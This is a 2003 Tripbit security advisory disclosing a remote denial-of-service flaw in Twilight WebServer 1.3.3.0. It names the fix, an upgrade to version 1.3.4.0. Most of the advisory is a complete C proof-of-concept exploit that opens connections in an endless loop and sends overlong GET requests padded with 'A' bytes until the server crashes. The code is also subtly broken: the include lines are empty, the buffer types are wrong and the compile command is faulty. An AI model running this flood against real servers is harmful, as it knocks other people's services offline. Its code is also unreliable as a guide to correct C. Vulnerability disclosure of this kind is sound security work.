TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0 contributed by: rushjo ====================================================================================== Tripbit Security Advisory TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0 ====================================================================================== PROGRAM: Twilight WebServer v1.3.3.0 HOMEPAGE: http://www.twilightutilities.com NOT VULNERABLE VERSIONS: v1.3.4.0 RISK: Medium IMPACT: Denial of Service Attack RELEASE DATE: 2003-07 ====================================================================================== TABLE OF CONTENTS ====================================================================================== 1..........................................................DESCRIPTION 2..............................................................DETAILS 3..............................................................EXPLOIT 4............................................................SOLUTIONS 5........................................................VENDOR STATUS 6..............................................................CREDITS 7...........................................................DISCLAIMER 8...........................................................REFERENCES 9.............................................................FEEDBACK 1. DESCRIPTION ====================================================================================== "We are excited to present this completely new Modem Ready Internet Web Server supporting these terrific features. * Installs in seconds * Lets you INSTANTLY share pictures and files * Modem aware * Automates telling friends and family when you start serving * Automatically integrates your web camera * Allows others to send files to you * Automatically generates web pages * Supports file resume * A truely unique files-sharing tool" (This description is taken from the website of Twilight Ultilities) 2. DETAILS ====================================================================================== ¤ Remote DoS : A security vulnerability in Twilight WebServer allows remote attackers to crash the server by sending two an too long "get Request". 3. EXPLOIT ====================================================================================== This is an Proof of Concept Exploit of this Buffer Overflow Vul- nerability. NOTE: This is only for INFORMATION purposes and not for any destructive acts! /**************************************************************************** * Title: Denial of Service Attack against Twilight Webserver v1.3.3.0 * Author: posidron * * Date: 2003-07-07 * Reference: http://www.twilightutilities.com * Version: Twilight Webserver v1.3.3.0 * Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt * * Exploit: twilight.c * Compile: gcc twilight -o twilight * * Tripbit Security Development * * Contact * [-] Mail: posidron@tripbit.org * [-] Web: http://www.tripbit.org * [-] IRC: irc.euirc.net 6667 #tripbit * * Program received signal SIGSEGV, Segmentation fault. * 0x41d780 in ?? () *****************************************************************************/ #include #include #include #include #include int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in srv; struct hostent *host; char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n"; memset(flood, 0x41, 1037); strncpy(send, get, sizeof(send) -1); strncat(send, flood, sizeof(send) - strlen(send) -1); strncat(send, http, sizeof(send) - strlen(send) -1); if(argc < 3) { printf("Usage: %s [target] \n", argv[0]); exit(0); } if((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host!\n"); exit(0); } srv.sin_family = AF_INET; srv.sin_port = htons(atoi(argv[2])); srv.sin_addr.s_addr = inet_addr((char*)argv[1]); printf("DoS against Twilight Webserver v1.3.3.0\n"); for(;;) { if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Can't start socket()!\n"); exit(0); } if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0) { printf("Connection to server broken!\n"); close(sockfd); } if(write(sockfd, send, strlen(send)) < 0) { break; } close(sockfd); } printf("Attack done!...\n"); return 0; } This error causes an "crash" of the Twilight WebServer v1.3.3.0. 4. SOLUTIONS ================================================================================ Upgrade your Twilight WebServer to the new fixed version v.1.3.4.0. This version is avaible at http://www.twilightutilities.com. 5. VENDOR STATUS ================================================================================ The vendor has reportedly been notified. He didn't answer to your report but NOW there is an new fixed version avaible for download. 6. CREDITS ================================================================================ Discovered by posidron 7. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 8. REFERENCES ====================================================================== - Original Version: http://www.tripbit.org 9. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Tripbit Security Advisory http://www.tripbit.org rushjo@tripbit.org posidron@tripbit.org